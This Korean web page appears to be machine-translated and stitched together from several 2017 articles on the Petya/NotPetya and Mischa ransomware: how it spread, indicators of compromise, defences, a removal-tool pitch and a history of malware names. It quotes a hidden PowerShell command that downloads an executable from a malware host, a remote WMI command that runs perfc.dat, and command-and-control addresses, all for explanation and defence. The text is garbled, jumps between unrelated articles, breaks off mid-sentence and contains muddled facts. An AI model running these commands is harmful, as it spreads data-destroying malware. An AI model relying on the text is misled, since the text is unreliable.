기계적 인조 인간. 운영 체제. 멀티미디어. 소셜 미디어. 도구. 코덱. 그래픽 아트
현재 위치: » »

Misha 바이러스의 기능은 무엇입니까? Petya와 유사하게 Misha의 친구: 새로운 랜섬웨어 바이러스에 대해 알려진 것

인터넷에 새로운 랜섬웨어 바이러스가 유행하고 있습니다. 악성코드는 수십 명의 작업을 실질적으로 차단했습니다. 대기업, 암호 해독을 요구함 하드 드라이브워크스테이션 400달러도 안 됐어요.

새로운 전염병으로 인한 패닉은 정보 혼란을 야기했습니다. 먼저 안티 바이러스 분석가들이 WannaCry의 재림을 발표한 후 악성 코드는 새로 조립된 암호화 바이러스 "Petya"와 "Misha"의 복합체로 식별되었습니다. ~에 이 순간바이러스가 Petya를 기반으로 한 것이라면 크게 변형된 것이 분명합니다.

배포 모델은 부분적으로 WannaCry와 유사합니다. 즉, MS Word의 취약점을 사용하는 사회 공학에 의해 강화된 MS17-010 취약점에 대한 익스플로잇이 사용됩니다. 사용자가 2017년 4월에 게시된 CVE-2017-0199 취약점을 악용하는 파일을 다운로드하거나 이메일 첨부 파일을 열면 감염이 발생합니다. 그리고 네트워크의 다른 컴퓨터로의 배포는 이미 일련의 기술을 통해 보장됩니다.

  • 사용자 비밀번호를 훔치거나 활성 세션을 사용하여 다른 네트워크 노드에 액세스합니다(Mimikatz 유틸리티 코드가 사용됨).
  • SMB의 취약점(CVE-2017-0144, MS17-010)을 통해 - WannaCry에서 성공적으로 사용된 것과 동일한 유명한 EthernalBlue 익스플로잇을 사용합니다.

악성코드는 훔친 것을 사용합니다. 계정그의 시체를 admin$ 공유에 복사하고 합법적인 PsExec 유틸리티를 사용하여 실행합니다. 리모콘컴퓨터.

유명 프로그램 개발자 미미카츠, 확인됨수정된 코드가 비밀번호를 추출하는 데 사용된다는 점입니다.

WMI 인터페이스를 사용하여 설치를 실행하는 코드도 Microsoft 블로그에 게시되었습니다.

SMB 벡터를 통한 감염은 WannaCry에 사용된 기술과 유사한 CVE-2017-0144 취약점을 사용합니다.

하지만 워너크라이에 비해 암호화 모델이 크게 바뀌었습니다. 컴퓨터에 침투한 바이러스는 시스템의 MBR(마스터 부트 레코드)을 감염시키고 마스터 파일 테이블을 포함하여 하드 드라이브의 처음 몇 블록을 암호화하여 전체 시스템을 암호화합니다. HDD랜섬웨어 바이러스가 일반적으로 그러는 것처럼 개별 파일뿐만 아니라 사용자도 마찬가지입니다.

강탈자에게 몸값을 지불하는 것은 확실히 가치가 없으며 윤리적인 이유뿐만 아니라 바이러스 분석가는 몸값을 지불한 후 파일을 해독하는 것이 원칙적으로 불가능하다는 결론에 도달했습니다. 이 기능은 단순히 악성코드에 포함되어 있지 않습니다. 사실 이는 랜섬웨어의 전염병이 아니라, 데이터를 파괴하는 와이퍼 바이러스의 전염병이다.

러시아 언론 보도에 따르면 가장 큰 문제 Rosneft 회사에서 충돌이 발생하여 회사의 주요 웹 사이트와 Bashneft 웹 사이트가 오랫동안 비활성화되었습니다.

프랑스, 스페인, 러시아, CIS 국가에서 대규모 감염이 기록되었습니다. 우크라이나에서는 수십 개의 정부 및 상업 조직이 바이러스의 영향을 받았습니다.

누가 필요합니까?

복구 메커니즘이 코드에 포함되어 있지 않았기 때문에 공격자에게 동기를 부여할 수 있는 세 가지 옵션이 있습니다. 그들은 누군가의 특정 데이터를 의도적으로 파괴하는 것을 대규모 전염병으로 위장하고 싶었거나 처음에는 아무것도 복원할 의도 없이 돈을 벌고 싶었습니다. 가능성이 가장 낮은 옵션은 사이버 기물 파손입니다. 바이러스는 심각한 제품이므로 돈을 벌 수 있는 무언가에 바이러스를 만드는 데 노력을 기울이는 것이 더 현명할 것입니다. 파괴자는 명성을 얻기 위해 시스템을 파괴하는 것이 유행이었던 1990년대에는 흔했지만 지금은 극히 드뭅니다.

결과적으로 지난 2개월 동안 발생한 전염병의 주요 수혜자는 분명히 EthernalBlue 익스플로잇을 배포한 The Shadow Brokers 그룹이었습니다. 강탈범들은 전염병으로 인한 피해 금액보다 몇 자릿수 적은 비교적 적은 금액의 돈을 모았습니다. 전염병은 NSA 아카이브의 다른 공격에 대한 정보를 판매할 준비가 되었다고 주장하는 The Shadow Brokers의 훌륭한 광고가 되었습니다. 결국 EthernalBlue는 2016년 8월 비밀 경호국에서 도난당한 수십 건의 익스플로잇 중 하나일 뿐입니다.

공격 메커니즘

공격자는 Windows를 실행하는 워크스테이션을 통해 파일이나 링크를 보낼 수 있습니다(전염병의 초기 단계에는 Petya.apx, myguy.exe, myguy.xls, Order-[모든 날짜].doc 파일). 감염된. 예를 들어 Order-[모든 날짜].doc 파일을 열면 서버 84.200.16.242가 포트 80에서 연결되고 xls가 다운로드됩니다.

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [프로세스 ID], 추가 컨텍스트: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[random number].exe") ;)

그런 다음 악성 코드는 명령 및 제어 서버일 가능성이 있는 서버 111.90.139.247:80 및 COFFEINOFFICE.XYZ:80에 연결을 시도합니다.

손상의 지표는 파일의 존재입니다.

C:\Windows\perfc.dat
C:\myguy.xls.hta

호스트에 할당된 후 다른 Windows 머신이는 네트워크에서 MS17-010(WannaCry에서 사용하는 것과 동일한)에 설명된 취약점을 통해 포트 tcp:135, tcp:139, tcp:445, tcp:1024-1035에서 확산됩니다.

다음 명령을 실행하여 배포할 수도 있습니다.

원격 WMI, “프로세스 호출 생성 "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"


감염 확산 다이어그램은 blog.kryptoslogic.com에서 가져왔습니다.

감염을 피하는 방법?

French-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Order-[모든 날짜].doc

3. 패치 설치

4. MS17-010에 대한 악용을 차단하도록 IPS를 구성합니다.

5. 아직 감염되지 않은 호스트를 보호하려면 확장명 없이 c:\windows\perfc 파일을 생성할 수 있습니다. 이러한 노드는 감염되지 않습니다.

몇 달 전, 우리와 다른 IT 보안 전문가들은 새로운 악성 코드를 발견했습니다. 페트야(Win32.Trojan-Ransom.Petya.A). 고전적인 의미에서 이 바이러스는 암호화 도구가 아니며 단순히 특정 유형의 파일에 대한 액세스를 차단하고 몸값을 요구했습니다. 바이러스가 변형되었습니다 부팅 항목하드 드라이브에서 PC를 강제로 재부팅하고 "데이터가 암호화되었습니다. 암호 해독에 돈을 낭비하십시오"라는 메시지를 표시했습니다. 전체적으로 표준 구성표파일이 실제로 암호화되지 않았다는 점을 제외하면 랜섬웨어 바이러스입니다. 가장 널리 사용되는 바이러스 백신은 Win32.Trojan-Ransom.Petya.A가 나타난 지 몇 주 후에 이를 식별하고 제거하기 시작했습니다. 또한, 다음 사항에 대한 지침이 있습니다. 수동 제거. Petya가 전형적인 랜섬웨어가 아니라고 생각하는 이유는 무엇입니까? 이 바이러스는 마스터 부트 레코드를 변경하고 OS가 로드되는 것을 방지하며 마스터 파일 테이블도 암호화합니다. 파일 자체를 암호화하지는 않습니다.

그러나 몇 주 전에는 더욱 정교한 바이러스가 나타났습니다. 미샤, 동일한 사기꾼이 작성한 것으로 보입니다. 이 바이러스는 파일을 암호화하며 암호 해독을 위해 $500 - $875를 지불해야 합니다( 다른 버전 1.5 – 1.8 비트코인). "암호해독"에 대한 지침과 이에 대한 지불은 YOUR_FILES_ARE_ENCRYPTED.HTML 및 YOUR_FILES_ARE_ENCRYPTED.TXT 파일에 저장됩니다.

Mischa 바이러스 – YOUR_FILES_ARE_ENCRYPTED.HTML 파일의 내용

실제로 해커는 Petya와 Mischa라는 두 가지 악성 코드로 사용자의 컴퓨터를 감염시킵니다. 첫 번째에는 시스템에 대한 관리자 권한이 필요합니다. 즉, 사용자가 Petya에 관리자 권한 부여를 거부하거나 이 악성코드를 수동으로 삭제하면 Mischa가 개입하게 됩니다. 이 바이러스는 관리자 권한이 필요하지 않습니다. 이는 전형적인 암호화 도구이며 실제로 강력한 AES 알고리즘을 사용하여 마스터 부트 레코드와 피해자 하드 드라이브의 파일 테이블을 변경하지 않고 파일을 암호화합니다.

미샤 악성코드는 암호화 뿐만 아니라 표준 유형파일(비디오, 사진, 프리젠테이션, 문서)뿐만 아니라 .exe 파일도 포함됩니다. 이 바이러스는 \Windows, \$Recycle.Bin, \Microsoft, \ 디렉터리에만 영향을 미치지 않습니다. 모질라 파이어 폭스,\오페라,\ 인터넷 익스플로러, \Temp, \Local, \LocalLow 및 \Chrome.

감염은 주로 바이러스 설치 프로그램이라는 첨부 파일이 포함된 편지를 받는 이메일을 통해 발생합니다. 이는 세금 서비스, 회계사의 편지, 구매 영수증 및 영수증 등을 첨부하여 암호화될 수 있습니다. 이러한 문자의 파일 확장자에 주의하십시오. 실행 파일(.exe)인 경우 Petya\Mischa 바이러스가 포함된 컨테이너일 가능성이 높습니다. 그리고 최근에 악성 코드가 수정된 경우 바이러스 백신이 응답하지 않을 수 있습니다.

2017년 6월 30일 업데이트: 6월 27일, Petya 바이러스의 변형 버전 (Petya.A)우크라이나에서 사용자를 대규모로 공격했습니다. 이번 공격의 효과는 엄청났고 경제적 피해는 아직 집계되지 않았다. 하루 만에 수십 개의 은행, 소매 체인, 정부 기관 및 다양한 형태의 소유권을 가진 기업의 업무가 마비되었습니다. 이 바이러스는 주로 최신 우크라이나 회계 보고 시스템인 MeDoc의 취약점을 통해 확산되었습니다. 자동 업데이트이 소프트웨어의. 또한 이 바이러스는 러시아, 스페인, 영국, 프랑스, ​​리투아니아와 같은 국가에도 영향을 미쳤습니다.

자동클리너를 이용하여 Petya, Mischa 바이러스 제거

일반적인 맬웨어, 특히 랜섬웨어를 처리하는 매우 효과적인 방법입니다. 입증된 보호 복합체를 사용하면 모든 바이러스 구성 요소의 철저한 감지가 보장됩니다. 완전한 제거한 번의 클릭으로. 메모, 우리 얘기 중이야두 가지 프로세스에 대해 설명합니다: 감염을 제거하고 PC에서 파일을 복원합니다. 그러나 이 위협을 사용하는 다른 컴퓨터 트로이 목마의 유입에 대한 정보가 있으므로 위협을 확실히 제거해야 합니다.

  1. . 소프트웨어를 시작한 후 버튼을 클릭하십시오 컴퓨터 검사 시작(스캔을 시작합니다).
  2. 설치된 소프트웨어는 검색 중에 감지된 위협에 대한 보고서를 제공합니다. 감지된 모든 위협을 제거하려면 옵션을 선택하십시오. 위협 수정(위협 제거). 문제의 악성코드가 완전히 제거됩니다.

암호화된 파일에 대한 액세스 복원

언급한 바와 같이 Mischa 랜섬웨어는 강력한 암호화 알고리즘을 사용하여 파일을 잠그므로 전례 없는 몸값(때때로 최대 1,000달러에 달함)을 지불하지 않으면 암호화된 데이터를 마술 지팡이로 복원할 수 없습니다. 그러나 일부 방법은 실제로 중요한 데이터를 복구하는 데 도움이 되는 생명의 은인이 될 수 있습니다. 아래에서 이에 대해 알아볼 수 있습니다.

자동 파일 복구 프로그램(복호화기)

매우 특이한 상황이 알려져 있습니다. 이 감염은 지워집니다. 소스 파일암호화되지 않은 형태로. 따라서 강탈 목적의 암호화 프로세스는 해당 복사본을 대상으로 합니다. 이는 그러한 기회를 제공합니다. 소프트웨어제거의 신뢰성이 보장되더라도 지워진 개체를 복원하는 방법. 파일 복구 절차를 사용하는 것이 좋습니다. 그 효과는 의심의 여지가 없습니다.

볼륨의 섀도 복사본

접근 방식은 Windows 절차를 기반으로 합니다. 예약 사본파일은 각 복구 지점에서 반복됩니다. 중요한 근무 조건 이 방법: 감염되기 전에 '시스템 복원' 기능을 활성화해야 합니다. 그러나 복원 지점 이후에 변경된 파일은 복원된 버전의 파일에 나타나지 않습니다.

지원

이것은 몸값이 아닌 모든 방법 중에서 가장 좋습니다. 컴퓨터에 대한 랜섬웨어 공격 이전에 외부 서버에 데이터를 백업하는 절차를 사용한 경우, 암호화된 파일을 복원하려면 적절한 인터페이스에 들어가서 필요한 파일을 선택하고 백업에서 데이터 복구 메커니즘을 시작하기만 하면 됩니다. 작업을 수행하기 전에 랜섬웨어가 완전히 제거되었는지 확인해야 합니다.

Petya 및 Mischa 랜섬웨어의 잔여 구성 요소가 있는지 확인하세요.

수동 치료는 숨겨진 운영 체제 개체 또는 레지스트리 항목으로 제거되지 않을 수 있는 개별 랜섬웨어 조각이 누락될 위험이 있습니다. 개별 악성 요소가 부분적으로 보존되는 위험을 제거하려면 악성 소프트웨어에 특화된 신뢰할 수 있는 보안 소프트웨어 패키지를 사용하여 컴퓨터를 검사하십시오.

명명의 역사에 대한 간략한 여행 악성 코드.

북마크에

Petya.A 바이러스 로고

6월 27일에는 최소 80개의 러시아와 우크라이나 기업이 Petya.A 바이러스의 공격을 받았습니다. 이 프로그램은 부서와 기업의 컴퓨터에 있는 정보를 차단하고, 잘 알려진 랜섬웨어 바이러스처럼 사용자에게 비트코인을 요구했습니다.

악성 프로그램의 이름은 대개 바이러스 백신 회사 직원이 지정합니다. 컴퓨터 감염 외에도 미디어 전염병을 유발하는 암호화 프로그램, 랜섬웨어, 파괴자 및 신원 도용은 예외입니다. 즉, 미디어의 과대광고 증가와 네트워크에서의 활발한 토론이 가능합니다.

그러나 Petya.A 바이러스는 새로운 세대를 대표합니다. 그가 자신을 소개하는 이름은 일부입니다. 마케팅 전략개발자들은 다크넷 시장에서 인지도를 높이고 인기를 높이는 것을 목표로 했습니다.

하위문화 현상

컴퓨터 수가 적고 모든 컴퓨터가 서로 연결되지 않았던 당시에는 자체 전파 프로그램(아직 바이러스는 아님)이 이미 존재했습니다. 그 중 첫 번째는 사용자에게 농담으로 인사하고 그를 붙잡아 삭제하겠다고 제안한 것이었습니다. 다음으로 쿠키몬스터는 '쿠키'라는 단어를 입력해 '쿠키를 달라'고 요구했다.

초기 악성 코드에도 유머 감각이 있었지만 이름에는 항상 그런 것은 없었습니다. 따라서 Apple-2 컴퓨터용으로 설계된 Richard Scrant는 컴퓨터를 50번 시작할 때마다 피해자에게 시를 읽어 주었으며, 종종 코드에 숨겨져 표시되지 않는 바이러스의 이름은 괴짜들 사이에서 흔히 볼 수 있는 농담과 하위문화 단어를 참조했습니다. 그때의. 메탈 밴드 이름, 대중 문학, 테이블탑 롤플레잉 게임과 연관될 수 있습니다.

20세기 말에 바이러스 제작자는 그다지 숨기지 않았습니다. 더욱이 프로그램이 통제를 벗어났을 때 바이러스로 인한 피해를 제거하는 데 참여하려고 하는 경우가 많았습니다. 이것은 Y-Combinator 비즈니스 인큐베이터의 미래 공동 창립자가 만든 파키스탄의 파괴적인 사례의 경우입니다.

Evgeniy Kaspersky가 1992년 저서 "MS-DOS의 컴퓨터 바이러스"에서 언급한 러시아 바이러스 중 하나도 시적인 능력을 보여주었습니다. Condom-1581 프로그램은 때때로 피해자에게 인간 폐기물로 인해 세계 바다가 막히는 문제에 전념하는 프로그램을 보여주었습니다.

지리 및 달력

1987년 이스라엘 바이러스라고도 알려진 예루살렘 바이러스는 처음 발견된 장소의 이름을 따서 명명되었으며, 대체 이름블랙프라이데이는 매월 13일이 금요일이면 실행파일을 활성화하고 삭제한다는 점에서 유래됐다.

1992년 봄 언론에 공황을 일으켰던 미켈란젤로 바이러스도 달력 원리에 따라 명명됐다. 나중에 가장 침입적인 바이러스 백신 중 하나를 만든 것으로 유명한 John McAfee는 시드니 사이버 보안 컨퍼런스에서 언론인과 대중에게 다음과 같이 말했습니다. "3월 6일에 감염된 시스템을 부팅하면 하드 드라이브의 모든 데이터가 손상됩니다." 미켈란젤로는 이것과 무슨 관련이 있습니까? 3월 6일은 이탈리아 예술가의 생일이었습니다. 그러나 McAfee가 예측한 공포는 결국 과장되었습니다.

기능성

바이러스의 능력과 특이성은 종종 이름의 기초가 됩니다. 1990년 최초의 다형성 바이러스 중 하나는 카멜레온(Chameleon)으로 명명되었으며, 자신의 존재를 숨길 수 있는 광범위한 능력을 갖고 있는(따라서 스텔스 바이러스 범주에 속함) 프로도(Frodo)라는 이름이 붙었습니다. 이는 “The Lord of the Lord”의 영웅을 암시합니다. 반지”와 타인의 눈에 숨어있는 반지. 예를 들어, 1994년 OneHalf 바이러스는 공격받은 장치의 디스크 절반을 감염시키는 것만으로도 공격성을 보였다는 사실 때문에 그 이름을 얻었습니다.

서비스 제목

대부분의 바이러스는 오랫동안 실험실에서 이름이 지정되어 분석가가 여러 부분으로 분석했습니다.

일반적으로 이러한 이름은 바이러스 범주, 공격하는 시스템 및 해당 바이러스로 수행하는 작업을 설명하는 지루한 일련 이름 및 일반적인 "계열" 이름입니다(예: Win32.HLLP.DeTroie). 그러나 때로는 개발자가 남긴 힌트가 프로그램 코드에서 드러나면서 바이러스에 약간의 개성이 생기기도 합니다. 예를 들어 MyDoom 및 KooKoo 바이러스가 나타난 방식입니다.

그러나 이 규칙이 항상 작동하는 것은 아닙니다. 예를 들어 이란의 우라늄 농축 원심분리기를 중단시킨 Stuxnet 바이러스는 Myrtus라고 불리지 않았지만 코드에 있는 이 단어("머틀")는 이스라엘의 참여를 암시하는 거의 직접적인 암시였습니다. 정보 서비스가 개발 중입니다. 이 경우 이미 일반 대중에게 알려진 이름으로, 발견 초기 단계에서 바이러스에 할당된 이름이 승리했습니다.

작업

연구하는 데 많은 관심과 노력이 필요한 바이러스는 쉽게 말하고 기록할 수 있는 아름다운 이름을 바이러스 백신 회사로부터 받는 경우가 종종 있습니다. 이는 Red October, 국제 관계에 영향을 미칠 수 있는 외교 서신 및 데이터뿐만 아니라 대규모 산업 스파이인 IceFog.

파일 확장자

널리 사용되는 또 다른 이름 지정 방법은 바이러스가 감염된 파일에 할당하는 확장명을 사용하는 것입니다. 따라서 "군사" 바이러스 중 하나인 Duqu는 스타워즈의 두쿠 백작의 이름을 따서 명명된 것이 아니라 생성된 파일을 표시하는 ~DQ 접두사 때문에 명명되었습니다.

이것이 올 봄에 감각적이라는 이름을 얻은 방법입니다. 워너크라이 바이러스.wncry 확장자로 암호화하는 데이터를 표시합니다.

이전 이름 바이러스를 원해 Decrypt0r, 인기를 얻지 못했습니다. 소리가 더 나빴고 철자가 달랐습니다. 모든 사람이 "0"을 "o"로 입력하려고 애쓰지는 않았습니다.

“당신은 Petya 랜섬웨어 바이러스의 피해자가 되었습니다”

이는 오늘날 가장 많이 회자되는 맬웨어가 공격받은 컴퓨터에서 파일 암호화를 완료한 후 나타나는 방식과 정확히 같습니다. Petya A. 바이러스는 눈에 띄는 이름뿐 아니라 해적 두개골과 이미지 형태의 로고 및 전체 마케팅 프로모션도 가지고 있습니다. 그 형제인 "Misha"와 함께 발견된 이 바이러스는 바로 이 때문에 분석가들의 관심을 끌었습니다.

서브컬처 현상에서 이런 '해킹'이 꽤 심각한 기술적 지식을 요하는 시기를 거치면서 바이러스는 사이버공격의 무기로 변모했다. 이제 그들은 시장 규칙에 따라 행동해야 하며, 더 많은 관심을 받는 사람은 개발자에게 큰 이익을 가져다줍니다.

6월 27일 화요일, 우크라이나와 러시아 기업대규모 바이러스 공격이 보고되었습니다. 기업의 컴퓨터에 몸값 메시지가 표시되었습니다. 해커로 인해 또 누가 피해를 입었는지, 중요한 데이터를 도난당하지 않도록 보호할 수 있는 방법은 무엇인지 알아봤습니다.

페티야, 그거면 충분해

에너지 부문이 가장 먼저 공격을 받았습니다. 우크라이나 기업 Ukrenergo와 Kyivenergo가 바이러스에 대해 불평했습니다. 공격자들은 컴퓨터 시스템을 마비시켰지만 발전소의 안정성에는 영향을 미치지 않았습니다.

우크라이나인들은 감염의 결과를 온라인에 게시하기 시작했습니다. 수많은 사진으로 판단하면 컴퓨터가 랜섬웨어 바이러스의 공격을 받았습니다. 영향을 받은 장치의 화면에는 모든 데이터가 암호화되었으며 장치 소유자가 비트코인으로 300달러의 몸값을 지불해야 한다는 메시지가 나타났습니다. 그러나 해커들은 워너크라이(WannaCry) 바이러스 공격처럼 데이터가 파기될 때까지 정보가 어떻게 처리될지 밝히지 않았고, 카운트다운 타이머도 설정하지 않았다.

우크라이나 국립은행(NBU)은 바이러스로 인해 여러 은행의 업무가 부분적으로 마비되었다고 보고했습니다. 우크라이나 언론에 따르면 이번 공격은 Oschadbank, Ukrsotsbank, Ukrgasbank 및 PrivatBank의 사무실에 영향을 미쳤습니다.

감염됐다 컴퓨터 네트워크"Ukrtelecom", 공항 "Borispol", "Ukrposhta", " 새 메일", "Kievvodokanal" 및 키예프 지하철. 또한 이 바이러스는 키예프스타(Kyivstar), 보다폰(Vodafone), 라이프셀(Lifecell) 등 우크라이나 이동통신사를 강타했습니다.

나중에 우크라이나 언론은 우리가 Petya.A 악성코드에 대해 이야기하고 있다고 분명히 밝혔습니다. 이는 해커를 위한 일반적인 계획에 따라 배포됩니다. 피해자는 첨부된 링크를 열도록 요청하는 인형으로부터 피싱 이메일을 받습니다. 그 후, 바이러스는 컴퓨터에 침투하여 파일을 암호화하고 이를 해독하기 위해 몸값을 요구합니다.

해커들은 돈을 이체해야 하는 비트코인 ​​지갑 번호를 표시했습니다. 거래 정보에 따르면 피해자는 이미 1.2비트코인(168,000루블 이상)을 이체했습니다.

전문가에 따르면 정보 보안 Group-IB 기업에서는 80개 이상의 기업이 공격을 받아 피해를 입었습니다. 범죄 연구소장은 이 바이러스가 워너크라이와 관련이 없다고 지적했습니다. 문제를 해결하기 위해 그는 TCP 포트 1024–1035, 135 및 445를 닫을 것을 권고했습니다.

누가 유죄인가

그녀는 공격이 러시아 또는 Donbass 영토에서 조직되었다고 서둘러 가정했지만 어떠한 증거도 제공하지 않았습니다. 우크라이나 인프라부 장관 봤다그는 자신의 페이스북에 "바이러스가 RUS로 끝나는 것은 우연이 아니다"라고 적고 추측에 윙크하는 이모티콘을 추가했다.

한편, 그는 이번 공격이 페트야(Petya)와 미샤(Mischa)로 알려진 기존 '악성코드'와 전혀 관련이 없다고 주장했다. 보안 전문가들은 새로운 물결이 우크라이나와 러시아 기업뿐만 아니라 다른 국가의 기업에도 영향을 미쳤다고 주장합니다.

그러나 현재 '악성코드'의 인터페이스는 몇 년 전 피싱 링크를 통해 유포되었던 잘 알려진 Petya 바이러스와 유사합니다. 12월 말, Petya 및 Mischa 랜섬웨어를 만든 정체불명의 해커가 이전 버전의 랜섬웨어와 동일한 GoldenEye라는 바이러스를 첨부하여 감염된 이메일을 보내기 시작했습니다.

인사부 직원들이 자주 받는 정기 서신의 첨부 파일에는 가짜 후보자에 대한 정보가 담겨 있었다. 파일 중 하나에서는 실제로 이력서를 찾을 수 있고 다음 파일에서는 바이러스 설치 프로그램을 찾을 수 있습니다. 그렇다면 공격자의 주요 목표는 독일 기업이었습니다. 24시간 동안 160명 이상의 독일 회사 직원이 함정에 빠졌습니다.

해커의 신원을 확인할 수는 없었지만 그가 본드 팬이라는 것은 분명하다. Petya 및 Mischa 프로그램은 영화 "Golden Eye"에 나오는 러시아 위성 "Petya"와 "Misha"의 이름으로, 줄거리에서 전자기 무기로 사용되었습니다.

Petya의 원본 버전은 2016년 4월부터 활발하게 배포되기 시작했습니다. 그녀는 능숙하게 컴퓨터로 변장하고 다른 사람인 척했습니다. 법률 프로그램확장된 관리자 권한을 요구합니다. 활성화 후 이 프로그램은 매우 공격적으로 행동했습니다. 몸값 지불 기한을 엄격하게 설정하고 1.3비트코인을 요구했으며 기한이 지나면 금전적 보상을 두 배로 늘렸습니다.

사실, 트위터 사용자 중 한 명이 랜섬웨어의 약점을 재빨리 발견하고 랜섬웨어를 만들었습니다. 간단한 프로그램, 이는 7초 만에 아무런 결과 없이 컴퓨터를 잠금 해제하고 모든 데이터의 암호를 해독할 수 있는 키를 생성했습니다.

처음이 아니야

5월 중순, 전 세계 컴퓨터가 WannaCry라고도 알려진 유사한 랜섬웨어 바이러스인 WannaCrypt0r 2.0의 공격을 받았습니다. 단 몇 시간 만에 수십만 노동자의 업무를 마비시켰다. Windows 장치 70개국 이상에서. 희생자 중에는 러시아 보안군, 은행, 이동통신사 등이 포함됐다. 바이러스는 피해자의 컴퓨터에 침입한 후 하드 드라이브를 암호화하고 공격자에게 비트코인으로 300달러를 보내라고 요구했습니다. 반영을 위해 3일을 할당한 후 그 양을 두 배로 늘렸고, 일주일 후에는 파일이 영원히 암호화되었습니다.

하지만 피해자들은 몸값 지불을 서두르지 않았고, 악성코드 제작자는

일러스트 저작권아빠이미지 캡션 전문가들에 따르면, 새로운 랜섬웨어에 맞서 싸우는 것이 워너크라이(WannaCry)보다 더 어렵다고 합니다.

6월 27일, 랜섬웨어는 전 세계 수십 개 회사의 컴퓨터와 암호화된 파일을 잠갔습니다.

우크라이나 기업이 가장 큰 피해를 입은 것으로 알려졌습니다. 바이러스는 대기업, 정부 기관 및 인프라 시설의 컴퓨터를 감염시켰습니다.

이 바이러스는 파일을 해독하기 위해 피해자에게 비트코인 ​​300달러를 요구합니다.

BBC 러시아 서비스는 새로운 위협에 대한 주요 질문에 답변합니다.

누가 다쳤나요?

바이러스의 확산은 우크라이나에서 시작되었습니다. Boryspil 공항, Ukrenergo의 일부 지역 부서, 체인점, 은행, 미디어 및 통신 회사가 영향을 받았습니다. 우크라이나 정부의 컴퓨터도 다운되었습니다.

그 후 러시아 기업의 차례가 되었습니다. Rosneft, Bashneft, Mondelеz International, Mars, Nivea 등도 바이러스의 피해자가 되었습니다.

바이러스는 어떻게 작동하나요?

전문가들은 아직 신종 바이러스의 기원에 대해 합의에 도달하지 못했습니다. Group-IB와 Positive Technologies는 이를 2016년 Petya 바이러스의 변종으로 보고 있습니다.

"이것은 강탈이다. 소프트웨어해킹 방법과 유틸리티를 모두 사용하며, 표준 유틸리티시스템 관리”라고 Positive Technologies의 정보 보안 위협 대응 부서 책임자인 Elmar Nabigaev는 말합니다. - 이 모든 것이 보장됩니다 고속네트워크 내 확산 및 전염병의 규모 전체(적어도 하나의 경우) 개인용 컴퓨터). 그 결과 컴퓨터가 완전히 작동하지 않고 데이터가 암호화되었습니다."

루마니아 회사인 Bitdefender는 Petya가 Misha라는 또 다른 악성 코드와 결합된 GoldenEye 바이러스와 더 많은 공통점을 발견했습니다. 후자의 장점은 파일을 암호화하기 위해 미래의 피해자에게 관리자 권한이 필요하지 않고 독립적으로 추출된다는 것입니다.

브라이언 캠벨 Fujitsu와 다른 많은 전문가들은 다음과 같이 믿습니다. 신종 바이러스미국 국가안보국(NSA)에서 훔친 수정된 EternalBlue 프로그램을 사용합니다.

2017년 4월 해커 The Shadow Brokers가 이 프로그램을 공개한 후 이를 기반으로 만들어진 WannaCry 랜섬웨어 바이러스가 전 세계로 퍼졌습니다.

이 프로그램은 Windows 취약점을 이용하여 바이러스가 컴퓨터 전체로 확산되도록 허용합니다. 기업 네트워크. 원본 Petya는 다음을 통해 전송되었습니다. 이메일이력서로 위장하여 이력서가 열린 컴퓨터만 감염시킬 수 있습니다.

Kaspersky Lab은 Interfax에 이 랜섬웨어 바이러스가 이전에 알려진 악성 소프트웨어 계열에 속하지 않는다고 말했습니다.

Kaspersky Lab의 안티 바이러스 연구 부서 책임자인 Vyacheslav Zakorzhevsky는 “Kaspersky Lab 소프트웨어 제품은 이 악성 코드를 UDS:DangeroundObject.Multi.Generic으로 탐지합니다.”라고 말했습니다.

일반적으로 새로운 바이러스를 러시아 이름으로 부르는 경우 여러 악성 프로그램으로 구성되어 있기 때문에 외관상으로는 프랑켄슈타인의 괴물과 더 비슷해 보인다는 점을 명심해야 합니다. 이 바이러스가 2017년 6월 18일에 탄생한 것은 확실한 것으로 알려져 있습니다.

이미지 캡션 이 바이러스는 파일을 해독하고 컴퓨터를 잠금 해제하는 데 300달러를 요구합니다.

WannaCry보다 더 멋진가요?

2017년 5월 WannaCry가 불과 며칠 만에 역사상 가장 큰 사이버 공격이 되었습니다. 새로운 랜섬웨어 바이러스는 최근의 전작을 능가할 것인가?

공격자는 하루도 채 안 되어 피해자로부터 2.1비트코인(약 5,000달러)을 받았습니다. WannaCry는 같은 기간 동안 7개의 비트코인을 수집했습니다.

동시에 Positive Technologies의 Elmar Nabigaev에 따르면 새로운 랜섬웨어에 맞서 싸우는 것이 더 어렵습니다.

"이 위협은 [Windows 취약점]을 악용하는 것 외에도 계정을 통해 확산됩니다. 운영체제, 특별한 해커 도구를 사용하여 도난당했습니다.”라고 전문가는 지적했습니다.

바이러스와 싸우는 방법?

예방 조치로 전문가들은 운영 체제 업데이트를 제때 설치하고 이메일로 받은 파일을 확인하라고 조언합니다.

고급 관리자는 SMB(서버 메시지 블록) 네트워크 전송 프로토콜을 일시적으로 비활성화하는 것이 좋습니다.

컴퓨터가 감염된 경우 어떠한 경우에도 공격자에게 비용을 지불해서는 안 됩니다. 일단 지불을 받으면 더 많은 것을 요구하지 않고 파일의 암호를 해독할 것이라는 보장은 없습니다.

남은 것은 암호 해독 프로그램을 기다리는 것뿐입니다. WannaCry의 경우 프랑스 회사 Quarkslab의 전문가인 Adrien Guinier가 프로그램을 만드는 데 일주일이 걸렸습니다.

최초의 AIDS 랜섬웨어(PC Cyborg)는 1989년 생물학자 Joseph Popp에 의해 작성되었습니다. 그녀는 디렉토리와 암호화된 파일을 숨기고 189달러를 요구했습니다." 라이센스 갱신" 파나마 계좌로. Popp는 플로피 디스크를 사용하여 자신의 아이디어를 일반 우편으로 배포하여 총 약 20,000개를 만들었습니다.야흐선적. Popp는 수표를 현금으로 바꾸려고 시도하다가 구금되었지만 재판을 피했습니다. 1991년에 그는 정신 이상자로 선고되었습니다.

표제:
공유하다